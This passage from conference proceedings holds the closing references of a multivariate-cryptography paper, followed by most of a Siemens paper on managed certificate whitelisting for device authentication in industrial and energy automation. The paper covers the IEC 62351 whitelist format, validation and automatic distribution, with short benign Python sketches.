[3] T.-T. Moh, "A public key system with signature and master key functions," Comm. in Algebra, vol. 27, no. 5, 1999, pp. 2207–2222.
[4] C. Wolf, A. Braeken, and B. Preneel, "On the security of stepwise triangular systems," Designs, Codes and Cryptography, vol. 40, no. 3, 2006, pp. 285–302.
[5] D. Gligoroski et al., "MQQ-SIG – an ultra-fast and provably CMA resistant digital signature scheme," in INTRUST, ser. LNCS, vol. 7222. Springer, 2011, pp. 184–203.
[6] B.-Y. Yang, J.-M. Chen, and Y.-H. Chen, "TTS: High-speed signatures on a low-cost smart card," in CHES, ser. LNCS, vol. 3156. Springer, 2004, pp. 371–385.
[7] B.-Y. Yang and J.-M. Chen, "Building secure tame-like multivariate public-key cryptosystems: The new TTS," in ACISP '05, ser. LNCS, vol. 3574. Springer, 2005, pp. 518–531.
[8] H. Imai and T. Matsumoto, "Algebraic methods for constructing asymmetric cryptosystems," in AAECC, ser. LNCS, vol. 229. Springer, 1985, pp. 108–119.
[9] N. Courtois, L. Goubin, and J. Patarin, "SFLASH, a fast asymmetric signature scheme for low-cost smartcards – primitive specification and supporting documentation." [Online]. Available: www.minrank.org/sflash-b-v2.pdf [Retrieved: September 2014].
[10] J. Patarin, "Hidden Fields Equations (HFE) and Isomorphisms of Polynomials (IP): two new families of asymmetric algorithms," in Advances in Cryptology – EUROCRYPT '96, ser. LNCS, vol. 1070. Springer, 1996, pp. 33–48.
[11] O. Billet, J. Patarin, and Y. Seurin, "Analysis of intermediate field systems," Cryptology ePrint Archive, Report 2009/542, 2009.
[12] C.-H. O. Chen, M.-S. Chen, J. Ding, F. Werner, and B.-Y. Yang, "Odd-char multivariate hidden field equations," Cryptology ePrint Archive, Report 2008/543, 2008.
[13] J. Patarin, N. Courtois, and L. Goubin, "QUARTZ, 128-bit long digital signatures," in CT-RSA, ser. LNCS, vol. 2020. Springer, 2001, pp. 282–297.
[14] N. Courtois and L. Goubin, "Cryptanalysis of the TTM cryptosystem," in Advances in Cryptology – ASIACRYPT '00, ser. LNCS, vol. 1976. Springer, 2000, pp. 44–57.
[15] A. Kipnis and A. Shamir, "Cryptanalysis of the HFE public key cryptosystem by relinearization," in Advances in Cryptology – CRYPTO '99, ser. LNCS, vol. 1666. Springer, 1999, pp. 19–30.
[16] E. Thomae and C. Wolf, "Cryptanalysis of Enhanced TTS, STS and all its variants, or: Why cross-terms are important," in Progress in Cryptology – AFRICACRYPT '12, ser. LNCS, vol. 7374. Springer, 2012, pp. 188–202.
[17] L. Bettale, J.-C. Faugère, and L. Perret, "Cryptanalysis of HFE, multi-HFE and variants for odd and even characteristic," Designs, Codes and Cryptography, vol. 69, no. 1, 2013, pp. 1–52.
[18] N. T. Courtois, "Efficient zero-knowledge authentication based on a linear algebra problem MinRank," in Advances in Cryptology – ASIACRYPT '01, ser. LNCS, vol. 2248. Springer, 2001, pp. 402–421.
[19] C. Wolf and B. Preneel, "Large superfluous keys in multivariate quadratic asymmetric systems," in Public Key Cryptography, ser. LNCS, vol. 3386. Springer, 2005, pp. 275–287.
[20] P.-A. Fouque, L. Granboulan, and J. Stern, "Differential cryptanalysis for multivariate schemes," in Advances in Cryptology – EUROCRYPT '05, ser. LNCS, vol. 3494. Springer, 2005, pp. 341–353.
[21] J. Ding, "A new variant of the Matsumoto-Imai cryptosystem through perturbation," in PKC, 2004, pp. 305–318.
[22] V. Dubois, L. Granboulan, and J. Stern, "An efficient provable distinguisher for HFE," in ICALP (2), ser. LNCS, vol. 4052. Springer, 2006, pp. 156–167.
[23] ——, "Cryptanalysis of HFE with internal perturbation," in Public Key Cryptography, ser. LNCS, vol. 4450. Springer, 2007, pp. 249–265.
[24] V. Dubois, P.-A. Fouque, A. Shamir, and J. Stern, "Practical cryptanalysis of SFLASH," in Advances in Cryptology – CRYPTO '07, ser. LNCS, A. Menezes, Ed., vol. 4622. Springer, 2007, pp. 1–12.
[25] V. Dubois, P.-A. Fouque, and J. Stern, "Cryptanalysis of SFLASH with slightly modified parameters," in Advances in Cryptology – EUROCRYPT '07, ser. LNCS, M. Naor, Ed., vol. 4515. Springer, 2007, pp. 264–275.
[26] J. Patarin, "Cryptanalysis of the Matsumoto and Imai public key scheme of EUROCRYPT '88," in Advances in Cryptology – CRYPTO '95, 1995, pp. 248–261.
[27] "NESSIE: New European schemes for signatures, integrity, and encryption," 2003. [Online]. Available: https://www.cosic.esat.kuleuven.be/nessie/ [Retrieved: September 2014].
[28] S. Tsujii, M. Gotaishi, K. Tadaki, and R. Fujita, "Proposal of a signature scheme based on STS trapdoor," in Post-Quantum Cryptography, ser. LNCS, vol. 6061. Springer, 2010, pp. 201–217.
[29] K. Sakumoto, T. Shirai, and H. Hiwatari, "On provable security of UOV and HFE signature schemes against chosen-message attack," in Post-Quantum Cryptography, ser. LNCS, vol. 7071, 2011, pp. 68–82.
[30] D. Smith-Tone, "On the differential security of multivariate public key cryptosystems," in Post-Quantum Cryptography, ser. LNCS, vol. 7071. Springer, 2011, pp. 130–142.
[31] R. Perlner and D. Smith-Tone, "A classification of differential invariants for multivariate post-quantum cryptosystems," in Post-Quantum Cryptography, ser. LNCS, vol. 7932. Springer, 2013, pp. 165–173.
[32] M. Matsui, "Linear cryptanalysis method for DES cipher," in Advances in Cryptology – EUROCRYPT '93, ser. LNCS, T. Helleseth, Ed., vol. 765. Springer, 1994, pp. 386–397.
[33] K. Nyberg, "On the construction of highly nonlinear permutations," in Advances in Cryptology – EUROCRYPT '92, ser. LNCS, vol. 658. Springer, 1992, pp. 92–98.
[34] C. Boura and A. Canteaut, "A new criterion for avoiding the propagation of linear relations through an Sbox," in FSE 2013 – Fast Software Encryption, ser. LNCS. Springer, 2014.
[35] W. Buss, G. Frandsen, and J. Shallit, "The computational complexity of some problems of linear algebra," J. Comput. System Sci., 1999.
[36] C. Wolf and B. Preneel, "Equivalent keys in multivariate quadratic public key systems," Journal of Mathematical Cryptology, vol. 4, April 2011, pp. 375–415.
[37] K. Nyberg, "Perfect nonlinear S-boxes," in Advances in Cryptology – EUROCRYPT '91, ser. LNCS, D. W. Davies, Ed., vol. 547. Springer, 1991, pp. 378–386.
[38] J. F. Dillon, "Elementary Hadamard difference sets," Ph.D. dissertation, University of Maryland, 1974.
[39] F. Chabaud and S. Vaudenay, "Links between differential and linear cryptanalysis," in Advances in Cryptology – EUROCRYPT '94, ser. LNCS, vol. 950. Springer, 1994, pp. 356–365.
[40] J. Ding, B.-Y. Yang, C.-H. O. Chen, M.-S. Chen, and C.-M. Cheng, "New differential-algebraic attacks and reparametrization of Rainbow," in ACNS, ser. LNCS, vol. 5037, 2008, pp. 242–257.
[41] J. Patarin and L. Goubin, "Asymmetric cryptography with S-boxes," in ICICS, ser. LNCS, vol. 1334. Springer, 1997, pp. 369–380.
[42] J. Ding, L. Hu, X. Nie, J. Li, and J. Wagner, "High order linearization equation (HOLE) attack on multivariate public key cryptosystems," in Public Key Cryptography '07, ser. LNCS, vol. 4450, 2007, pp. 233–248.
[43] J.-C. Faugère, M. Safey El Din, and P.-J. Spaenlehauer, "Gröbner bases of bihomogeneous ideals generated by polynomials of bidegree (1, 1): Algorithms and complexity," J. Symb. Comput., vol. 46, no. 4, 2011, pp. 406–437.
[44] M. Bardet, J.-C. Faugère, and B. Salvy, "On the complexity of Gröbner basis computation of semi-regular overdetermined algebraic equations," in ICPSS, 2004, pp. 71–75.
[45] M. Bardet, J.-C. Faugère, B. Salvy, and B.-Y. Yang, "Asymptotic behaviour of the degree of regularity of semi-regular polynomial systems," in MEGA '05, 2005.
[46] R. Lidl and H. Niederreiter, Finite Fields. Cambridge University Press, 1997.
[47] A. Braeken, C. Wolf, and B. Preneel, "A study of the security of unbalanced oil and vinegar signature schemes," in CT-RSA, ser. LNCS, A. Menezes, Ed., vol. 3376. Springer, 2005, pp. 29–43.
[48] E. Thomae, "About the Security of Multivariate Quadratic Public Key Schemes," Ph.D. dissertation, Ruhr-University Bochum, 2013.
[49] L. Budaghyan, C. Carlet, T. Helleseth, and A. Kholosha, "Generalized bent functions and their relation to Maiorana-McFarland class," in ISIT '12. IEEE, 2012, pp. 1212–1215.
Managed Certificate Whitelisting – A Basis for Internet of Things Security in
Industrial Automation Applications
Rainer Falk and Steffen Fries
Siemens AG
Corporate Technology
Munich, Germany
Email: {rainer.falk|steffen.fries}@siemens.com
Abstract—Device authentication is a basic security feature for automation systems and for the future Internet of Things. The design, set-up, and operation of a practically usable security infrastructure for the management of the required device credentials – such as cryptographic device keys and device certificates – is a huge challenge. Also, access permissions defining authorized communication peers have to be configured on devices. The set-up and operation of a public key infrastructure (PKI) with registration authority (RA) and certification authority (CA), as well as the management of device permissions, has proven to be burdensome for industrial application domains. A recent approach is based on certificate whitelisting. It is currently being standardized for field device communication within energy automation systems by IEC 62351, in alignment with ITU-T X.509. This new approach significantly changes the way digital certificates are used and managed. After describing the new approach of managed certificate whitelisting and giving a summary of ongoing standardization activities, an example of its application in a real-world application domain is described. Needs for further technical work are derived, and solution options are presented.
Keywords—Digital certificate, certificate whitelisting, credential management, PKI, device authentication, Internet of Things.
I. INTRODUCTION
Industrial automation systems, e.g., for energy automation, railway automation or process automation, use open communication protocols such as Ethernet, wireless local area network (WLAN) IEEE 802.11 [1], transmission control protocol (TCP), user datagram protocol (UDP), and hypertext transfer protocol (HTTP) [2]. The communication can be protected using standard security protocols like IEEE 802.1X/MACsec [3], Internet key exchange (IKE) [4] with Internet protocol security (IPsec) [5], secure shell (SSH) [6], secure sockets layer (SSL) [7], and transport layer security (TLS) [8]. Often, asymmetric cryptographic keys and corresponding device certificates are used, as symmetric keys would not scale well for the huge number of involved devices.
In a common realization of a public key infrastructure (PKI), digital certificates are issued by a trusted certification authority (CA). This allows devices to be authenticated. Additionally, access permissions are defined for authorized communication peers. While this technology could be the basis for global, uniform secure communication, in reality the deployment and adoption of PKIs is often limited to HTTP server authentication. A reason for that is the significant effort required to set up, maintain, and use a PKI.
The problem addressed in this paper is the practical management of device certificates for field-level automation devices.
A certificate infrastructure is required that is suitable for an
operational automation environment. Main considerations are
the demand for extremely high system availability, requiring
that the automation system can continue to operate in an
autonomous island mode, and the fact that many automation
systems are set-up as separate network segments that have no
or only limited connectivity with general office networks or
even the public Internet. Moreover, the fact that these systems
are typically engineered, e.g., that the communication relations
are known up front, can be leveraged for certificate and access
management.
A self-contained certificate management tool (command line
tool, or with GUI) can be well suited for a small number of
devices, but it does not scale well to scenarios with a larger
number of devices. A full-blown PKI infrastructure could be
efficient for an extremely huge number of devices, but these
go beyond the scale of a common single automation system.
The problem can be summarized as follows: a solution is needed
that can be set-up and operated autonomously within a certain automation environment without relying on a globally
accepted certification authority, and that scales well for “midsize” automation environments, for which a self-contained
certificate tool is too small, and a full PKI solution would
be too complex and costly. It may also be advantageous to
avoid the need for deploying a separate identity and access
management infrastructure.
The remainder of this paper is structured as follows: After summarizing background work in Section II, Section III describes certificate whitelists as a new paradigm for using digital certificates. The management of certificate whitelists is described generically in Section IV, and a specific adaptation to energy automation systems is outlined in Section V. An
outlook to possible future extensions is given in Section VI.
II. BACKGROUND AND PREVIOUS WORK
Secure communication protocols, digital certificates, and
public key infrastructures (PKI) [9], [10] have been dealt with
intensively for years. An introduction is given in common
text books on IT security [11]. The remainder of this section briefly summarizes the major aspects that are relevant to managed
certificate whitelists.
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
[Figure 1 sketches an X.509 public key certificate with example fields: Subject (entity associated with the certificate), Validity (period of validity), Serial Number (e.g., 31748), Subject Public Key, Issuer (name of the certificate issuer), and the issuer's digital Signature. The subject holds the private key corresponding to the certified public key.]
Fig. 1. Digital Certificate (X.509)
A. Device Communication Security Technologies
Digital device certificates are the basis for device communication security as used in industrial automation systems, and
in the future Internet of Things (IoT). Major communication
security protocols are available for the different layers of
the communication protocol stack that support digital device
certificates for authentication:
• Link layer: The standard 802.1X [3] provides Network
Access Control to restrict access to a network only for
authenticated devices. It is also possible to encrypt the
communication link using MACsec.
• Network layer: The communication can be protected with
IPsec [5] on the network layer. The required security
associations can be established by the IKE [4] protocol.
• Transport layer: With TLS [8], the successor of the SSL
protocol [7], communication can be protected on the
transport layer.
• Application layer: SSH or WS-Security are available to protect application layer protocols such as HTTP, SOA-style interfaces (REST, SOAP), CoAP, XMPP, or MQTT.
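As a small illustration of transport-layer device authentication, the sketch below builds a TLS server context that demands a client (device) certificate, using Python's standard ssl module. The CA bundle path is an illustrative assumption; a real deployment would load the operator's trust anchors.

```python
import ssl
from typing import Optional

def make_mutual_tls_context(ca_bundle: Optional[str] = None) -> ssl.SSLContext:
    """Sketch: a server-side TLS context for mutual authentication.

    The ca_bundle argument is a placeholder for the file holding the
    trusted CA or device certificates of the installation.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.verify_mode = ssl.CERT_REQUIRED   # reject peers without a certificate
    if ca_bundle:
        ctx.load_verify_locations(ca_bundle)
    return ctx

ctx = make_mutual_tls_context()
```

Requiring a client certificate (`CERT_REQUIRED`) is what turns a plain TLS server into one that authenticates devices, matching the device-certificate usage described above.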
B. Digital Certificates
The main purpose of a digital certificate is to reliably bind information about the subject, i. e., the owner, to a public key. The owner may be identified by its name or email address in the case of a person, or by its network name (DNS name) or IP address in the case of a server. Additional information encodes usage constraints of the public key and the digital certificate, such as the validity period and the allowed key usages, e. g., user authentication or email encryption. For device certificates, it is
possible to encode the device manufacturer, the device model,
and the serial number within a device certificate.
The most commonly used certificate format is ITU-T X.509 [9]. Figure 1 shows the format and some example
fields. The main purpose of a digital certificate is to bind a
public key (Subject Public Key Info) of an entity to
the name of the entity (Subject). Additional information, such as the validity period, the issuer, and usage restrictions, can be
included as well.
When a digital certificate of a subject is validated by a
communication peer, it is verified that the certificate has a
valid digital signature of a trusted certification authority. It is
furthermore verified that the entries of the certificate match the
intended usage. It may also be verified whether the certificate
has been revoked. A revocation check may verify whether
a given certificate is included in a certificate revocation list
(CRL), or an online revocation status check may be performed
using the online certificate status protocol (OCSP) [12]. In either case, at least partial online access to a PKI entity that issues certificates and provides revocation information is needed from at least one component in an automation network or cell.
This component may further distribute the information within
the automation cell.
C. Certificate Root Key
A digital certificate has to be validated before it is accepted.
This includes a check whether the digital signature protecting
the certificate is trusted. The standard approach is to use a set
of trusted root certificates for certification authorities (CA). A
certificate is accepted if its signature chain can be verified back
to a trusted root certificate. The root certificate may belong to
a globally recognized CA, or to a local CA that is accepted
only within an administrative domain, e. g., within a single
operator network. If no PKI with CA is available, it is also
possible to use self-signed certificates. This means that each
certificate is signed with the private key associated with the
public key contained in the certificate. Such certificates have
to be configured as trusted in the same way as trusted root
certificates, i. e., the (self-signed) certificates of trusted peers
have to be configured explicitly. This requires storing the trusted peer information (root CA, or self-signed certificates)
in a secure manner, as this information is crucial for system
security.
D. Certificate Whitelisting
The basic concept of certificate whitelists is well-known.
The underlying idea is to enumerate explicitly all authorized
certificates. A certificate is validated successfully only if it is
contained in the certificate whitelist. The whitelist may contain
the certificates directly, or reference the certificates by their
serial number and issuer, by the certificate fingerprint, or by
the public key. The latter avoids issuing a new whitelist when a certificate is updated.
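The three referencing styles above can be sketched as follows; this is a minimal Python illustration in which toy byte strings stand in for DER-encoded certificates and keys, and all names are illustrative. Matching on the public-key fingerprint survives certificate renewal as long as the key pair is reused.

```python
import hashlib

def fingerprint(der_bytes: bytes) -> str:
    """SHA-256 fingerprint over the (stand-in) DER encoding."""
    return hashlib.sha256(der_bytes).hexdigest()

def on_whitelist(cert_der, issuer, serial, pubkey_der, whitelist) -> bool:
    """A certificate matches if any of the three reference styles hits:
    issuer/serial pair, certificate fingerprint, or public-key fingerprint."""
    return (
        (issuer, serial) in whitelist["issuer_serial"]
        or fingerprint(cert_der) in whitelist["cert_fp"]
        or fingerprint(pubkey_der) in whitelist["pubkey_fp"]
    )

# Toy data standing in for DER-encoded structures.
cert, key = b"dev1-cert", b"dev1-key"
wl = {"issuer_serial": set(), "cert_fp": set(), "pubkey_fp": {fingerprint(key)}}
print(on_whitelist(cert, "Local CA", 31748, key, wl))  # True: key is pinned
```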
Such a certificate whitelist can also be considered and used as an access control list that contains the certificates of all authorized subjects. Without using specific certificate extensions, however, different operations cannot be distinguished. The configuration of the set of trusted root certificates is also a form of certificate whitelist. Checking whether the certificate of a communication peer is included in a certificate whitelist is a known technique [13]. Also, the Microsoft Digital Rights Management License Protocol uses a certificate whitelist [14].
As these certificate whitelists have been used as a proprietary means for configuring a list, or more precisely a set, of trusted certificates, the approach has so far been of limited use as a general means for certificate management.
III. CERTIFICATE MANAGEMENT AND VALIDATION USING CERTIFICATE WHITELISTS
The set-up and operation of a public key infrastructure has been shown to require significant effort and costs. This has
been a limiting factor for the practical usage of public key
cryptography. Ongoing standardization activities define the
technological basis for simpler usage of public key cryptography for industrial automation environments and the future
Internet of Things.
While a certificate whitelist has so far been used as a proprietary means for configuring certain digital certificates as trusted, a certificate whitelist format is currently being standardized for the smart energy grid environment. It has been acknowledged that the application of certificate whitelists in restricted environments supports the long-term administration of security parameters. Hence, standardizing the format is the logical next step to ensure interoperability between different vendors' products.
A certificate whitelist is a data structure containing, or referencing, a set of trusted digital certificates. A certificate can be referenced by its serial number and issuer,
or by a fingerprint of the certificate (hash value). The certificate
whitelist is signed using a whitelist root key of trust (WROT).
A certificate is validated successfully if it is contained
in a corresponding certificate whitelist. Further checks on
the contents of the certificate, such as the name of the subject,
the certificate extensions, and the certificate signature are
performed in the usual way.
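A minimal sketch of issuing and verifying a signed whitelist is given below. Note the hedge: a real CWL is signed with the asymmetric whitelist root key of trust (WROT), whereas this sketch uses a symmetric HMAC purely to keep the example self-contained and runnable; all names and data are illustrative.

```python
import hashlib, hmac, json

WROT_KEY = b"demo-wrot-key"  # placeholder stand-in for the WROT signing key

def issue_whitelist(entries: list) -> dict:
    """Serialize the whitelist body deterministically and sign it."""
    body = {"version": 1, "entries": sorted(entries)}
    blob = json.dumps(body, sort_keys=True).encode()
    sig = hmac.new(WROT_KEY, blob, hashlib.sha256).hexdigest()
    return {"body": body, "sig": sig}

def verify_whitelist(wl: dict) -> bool:
    """Recompute the signature over the body and compare in constant time."""
    blob = json.dumps(wl["body"], sort_keys=True).encode()
    expected = hmac.new(WROT_KEY, blob, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, wl["sig"])

wl = issue_whitelist(["fp-dev1", "fp-dev2"])
print(verify_whitelist(wl))  # True
```

The deterministic serialization (sorted keys, sorted entries) is what makes the signature reproducible at the verifier; any tampering with the entry list invalidates it.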
Certificate whitelists can be used with certificates issued by
a CA, or with self-signed certificates. A common technological
basis is provided for smaller environments using self-signed
certificates as well as environments using a PKI for issuing
certificates. So, a smooth migration from self-signed certificates to a local PKI, and even towards a global PKI, is provided.
A certificate can be revoked easily by no longer including it in the certificate whitelist. However, it is also
possible to check the certification revocation status using
certificate revocation lists [9] or using the online certificate
status protocol OCSP [12].
1) Standardization Activities: Ongoing standardization activities within ISO/IEC 62351 [15], in alignment with ITU-T X.509 [9], define the usage of certificate whitelists for energy automation systems. Currently, a format
is defined for a certificate whitelist. Figure 2 shows a recent
proposal for a certificate whitelist. It is based on the format
of a certificate revocation list CRL, but its assigned type
(CertificateWhiteList) distinguishes it from a CRL.
Also, the intended scope of a certificate whitelist is defined by
a specific attribute scope. It allows a client to verify whether
a certain certificate whitelist has in fact been intended for a
specific purpose. For example, the IP addresses or DNS names
of devices for which the whitelist is intended to be used can
be included.
The target scope of a certificate whitelist can be explicitly
encoded in a certificate whitelist. Therefore, a certificate
CertificateWhiteList ::= SEQUENCE {
    tbsCertWhiteList        TBSCertWhiteList,
    signatureAlgorithm      AlgorithmIdentifier,
    signatureValue          BIT STRING
}

TBSCertWhiteList ::= SEQUENCE {
    version                 Version OPTIONAL,  -- if present must be v1
    signature               AlgorithmIdentifier,
    issuer                  Name,
    thisUpdate              Time,
    nextUpdate              Time OPTIONAL,
    scopedList              SEQUENCE OF SEQUENCE {
        scope                   ScopeConstraints,  -- geographic, organizational
        authorizedCertificates  SEQUENCE OF SEQUENCE {
            fingerprint             AlgorithmIdentifier,  -- for FP creation
            certIdentifier          CHOICE {
                serialCert      [0] CertificateSerialNumber,
                fingerprintCert [1] OCTET STRING,  -- FP of certificate
                fingerprintPK   [2] OCTET STRING   -- FP of public key
            },
            certificateIssuer       Name OPTIONAL,
            cwlEntryRestriction     [0] EXPLICIT Extension OPTIONAL
                -- further restrictions of cert. usage
        }
    },
    cwlExtensions           [0] EXPLICIT Extensions OPTIONAL  -- for future use
}

Fig. 2. Certificate Whitelist Format [15]
[Flowchart: the certificate is first verified; on failure, an error message is raised. If the certificate carries the whitelist extension, the whitelist is fetched if necessary and its signature is verified; if that verification fails or the certificate is not on the whitelist, an error message is raised, otherwise the certificate is applied in the application. If the extension is not present, the certificate is applied directly after successful verification.]
Fig. 3. Validation of a Certificate with Certificate Whitelist
whitelist cannot be used unintentionally for a purpose other than the one intended at the time of compilation. Certificate whitelists can be compiled once as part of the engineering process. Alternatively, end devices can pull a certificate whitelist from a whitelist certificate server at defined time intervals. The CWL can also be pushed to the field devices.
A digital certificate may be intended to be used only
within a certificate whitelisting environment. To ensure that
a certificate is in fact validated successfully only together
with a corresponding whitelist, it is possible to include a
corresponding extension in the certificate. The extension marks the certificate explicitly as acceptable only if it is included in a certificate
whitelist. A corresponding certificate extension is currently
defined by ISO/IEC 62351 [15].
The validation of a certificate depends on whether it contains a certificate whitelist extension. Figure 3 shows the relevant checks. If a certificate includes the whitelisting extension,
it is required that the corresponding whitelist is available and
that the certificate is in fact included in the whitelist.
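The validation flow of Figure 3 can be sketched as follows; plain dictionaries stand in for parsed certificates and whitelists, and all field names are illustrative.

```python
def validate(cert: dict, fetch_whitelist) -> bool:
    """Decision flow of Fig. 3 (sketch): ordinary verification first,
    then whitelist checks only if the certificate carries the extension."""
    if not cert.get("signature_ok"):       # step 1: ordinary verification
        return False                       # -> error message
    if not cert.get("cwl_extension"):      # no whitelist extension:
        return True                        # apply certificate directly
    wl = fetch_whitelist()                 # fetch whitelist if necessary
    if wl is None or not wl.get("signature_ok"):
        return False                       # whitelist missing or invalid
    return cert["fingerprint"] in wl["entries"]

wl = {"signature_ok": True, "entries": {"fp-1"}}
cert = {"signature_ok": True, "cwl_extension": True, "fingerprint": "fp-1"}
print(validate(cert, lambda: wl))  # True
```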
IV. MANAGED CERTIFICATE WHITELISTS
The introduction of certificate whitelisting implies the need
for a management system for certificate whitelists. Managed
certificate whitelists are a new approach for using public key
cryptography in a practical, efficient and effective way. It is
particularly suited for systems with a well-known set of devices and communication relationships, as is common for networked automation systems. As the management of whitelists can be fully automated, it scales well to larger numbers of devices, although, due to the increasing size of the whitelists, the targeted application environment comprises roughly 100 to 1000 devices. It integrates well with existing industrial workflows
for installing or exchanging devices, as device configuration
databases are kept up-to-date within automation systems. So,
the information that is required to generate updated certificate whitelists is already available. Once certificate whitelists
have been generated and installed on the target devices, the
target devices can operate autonomously even if the security
infrastructure is not available. This is an important property for
automation environments with high availability requirements
to ensure that the automation system can continue to operate
even if backend systems are temporarily unavailable.
A. Whitelist Generation and Distribution
The basic concept for automatic whitelist management is
rather straightforward. Using information which is available
in common automation systems about the devices and their
communication relationships within a networked automation
system, several purpose-specific – and also device-specific if
needed – certificate whitelists are generated automatically. The
whitelists are distributed to the target devices using remote
configuration protocols. For example, secure copy (scp) [6],
HTTPS [16], or OPC-UA [17] can be used to distribute
configuration files securely to the target devices.
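The generation step can be sketched as follows; the device inventory and engineered communication relations below are illustrative and would, in a real system, come from the configuration and certificate databases.

```python
# Illustrative inventory: device name -> certificate fingerprint.
devices = {
    "ied1": "fp-ied1", "ied2": "fp-ied2", "ctrl": "fp-ctrl", "svc": "fp-svc",
}

# Engineered communication relations: (peer A, peer B, purpose).
relations = [
    ("ied1", "ctrl", "control"), ("ied2", "ctrl", "control"),
    ("svc", "ied1", "service"),
]

def compile_whitelists(devices: dict, relations: list) -> dict:
    """Compile one certificate whitelist per communication purpose
    from the engineered communication relations."""
    whitelists = {}
    for a, b, purpose in relations:
        whitelists.setdefault(purpose, set()).update({devices[a], devices[b]})
    return whitelists

wls = compile_whitelists(devices, relations)
print(sorted(wls["control"]))  # fingerprints of ied1, ied2, and ctrl
```

In practice each compiled set would then be wrapped in the signed CWL structure and handed to the distribution point.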
Figure 4 shows the main components involved in the automatic management of certificate whitelists. A central device
management component accesses a device database including
all registered devices of a networked automation system and
their associated device certificates. Using automation system configuration data, the communication relationships are
determined. Based on this information, certificate whitelists
can be compiled for the different communication purposes, such as automation control communication, supervisory control communication, remote service access, and diagnostic access.
Depending on policy, device-specific certificate whitelists can
be compiled, or certificate whitelists for defined purposes and
target device classes. The certificate whitelists are created
and provided to a device management system that configures
the relevant certificate whitelists on the target devices. An important difference from a certificate revocation list (CRL) is that a certificate whitelist will usually be provided and signed by the operator, not by the certification authority (CA). This
has the advantage that an automation system operator can use
managed certificate whitelists easily with certificates issued by
different CAs, and even with self-signed certificates.
[Block diagram: a configuration database (device inventory, plant configuration data) and a certificate database (CA keys, device certificates) feed a certificate whitelist compiler, which signs the whitelists with a whitelist signing key. A certificate whitelist distribution point then delivers them over the automation network to the field devices (FD).]
Fig. 4. Certificate Whitelist Management System
For networked automation systems with a typical size of
some 100 to some 1000 devices, such a certificate management
system based on whitelisting provides several advantages for
the application in real-world industrial usage scenarios: A
local PKI or even self-signed certificates can be used, so
that a deployment with a very limited security infrastructure
is possible. For the operation of the automation system, no continuous reachability or availability of the whitelisting security infrastructure is required, so the availability of the automation system does not depend on the availability of the security infrastructure. A commonly available device management infrastructure can easily be extended to automatically create and distribute certificate whitelists.
It is possible to use a certificate whitelist only for authentication. Authorization checks would then be performed in addition, e. g., by checking an access control list. However, a certificate whitelist can also be used directly as an access control list. Different certificate whitelists would be configured
for the different types of access (e. g., control communication,
service access, diagnosis). The current proposal for a CWL
structure considers this by supporting the encoding of a list
of lists. Moreover, within the CWL, further certificate usage
restrictions may be encoded. One example is the definition of
dedicated applications or communication protocols which are
allowed to utilize a dedicated certificate. Using this approach,
the communication peer could refuse to accept a certificate
included on the CWL if it is not associated within the CWL
with the currently used communication protocol.
This has the advantage that no separate identity and access
management infrastructure is needed, and that access control
decisions can be performed by a field device when the backend
systems are not available. These properties make certificate
whitelisting a very interesting approach for managing digital
certificates in typical industrial automation systems.
B. Example Usage Scenarios
Typical workflows in industrial automation systems are the
initial installation, the replacement, and removal of devices. As
device configuration databases are already maintained as part
of these workflows, the information for updating certificate
whitelists is available without any extra effort required from
the service personnel. As changes in the configuration are
detected by the certificate whitelisting system, the generation
of updated certificate whitelists is started and the deployment
to affected target devices is triggered.
V. APPLICATION WITHIN ENERGY AUTOMATION SYSTEMS
The general approach of using managed certificate whitelists
as described in the previous section can be applied for energy
automation systems (smart grid). Figure 5 shows a substation
automation system. A substation typically transforms voltage
levels, and includes power monitoring and protection functions. Figure 5 shows separate network zones of the substation
communication network. The field devices that perform the
actual field level functionality of monitoring and acting on
the electric power are called intelligent energy devices (IED).
They are monitored and controlled by a substation controller,
realizing a real-time automation system. Energy automation protocols are defined by the standard IEC 61850 [18], which defines the Generic Object Oriented Substation Events (GOOSE) protocol.
protocol. Additional network zones are available for local and
remote service access, for integrating intelligent field devices
with serial interfaces, and for support functions (file server,
historian server for logging, remote access server, terminal
server). A substation is connected to the utility communication
network providing backend services like supervisory control
and data acquisition (SCADA). Firewalls are used to control
the traffic flow between zones.
A hierarchical creation and distribution of certificate
whitelists to a substation may be realized in the following
way: A utility operator creates a substation-specific certificate
whitelist (substation cert whitelist) based on the engineering
information for this substation and distributes it to the substation controller. The specific substation is encoded in the CWL
by the scope restriction. Using engineering information that is
available at the substation controller, the substation controller
creates device-specific certificate whitelists for the field devices, i. e., intelligent energy devices (IED), of the substation.
The device-specific certificate whitelists are configured by the
substation controller on the different IEDs.
An alternative approach would be to compile a single CWL for a substation and to distribute this CWL to all components in the substation via the substation controller. Each IED then communicates only with the IEDs permitted by both the engineering data and the CWL, i. e., the access control decision is made by an IED by checking both the CWL and the engineering information. This saves the additional effort of creating device-specific CWLs, but has the disadvantage that each IED needs to search a larger CWL and has to check two pieces of configuration information separately. Which approach is more appropriate in a target environment is a validation performance decision. The generic definition of CWLs allows for both approaches.
A further usage scenario for certificate whitelisting within energy automation systems would be the integration of decentralized energy resources. Here, a smart grid operator could realize (managed) certificate pinning by using certificate whitelists. The operator would define which certificates are acceptable by including them in a whitelist, thereby using certificate whitelists to restrict the set of certificates issued by a larger PKI. The possibility of misusing broken certificates or CAs is reduced, as the set of accepted certificates is limited.
Fig. 5. Managed Certificate Whitelisting in Energy Automation Substations
VI. CONCLUSION AND OUTLOOK
Explicitly designating trusted certificates in certificate whitelists has recently been put forward within standardization for industrial energy automation communication [15].
It promises to provide a cost-efficient, easily deployable,
and operable approach for digital device certificates even if
self-signed certificates are used. It is intended for mid-sized
industrial automation domains, while providing a migration
path to more flexible PKI and access management structures. In particular, it avoids the use of simple, manually configured pre-shared secrets, which would be difficult to migrate to the more complex and managed security infrastructures that are expected to be advantageous for large-scale deployments.
The usage of certificate whitelisting can be supported with
automatic whitelist generation and distribution. A format for
certificate whitelists is currently being standardized to provide an interoperable format. Specific extensions can mark a
certificate explicitly for being used only in combination with
a certificate whitelist. Several additional extensions may be
introduced. It may be possible to indicate usage restrictions
within a certificate whitelist associated with a certain certificate entry. This could be used to limit the authorized usage
of a certificate on a certificate-by-certificate basis. Certificate
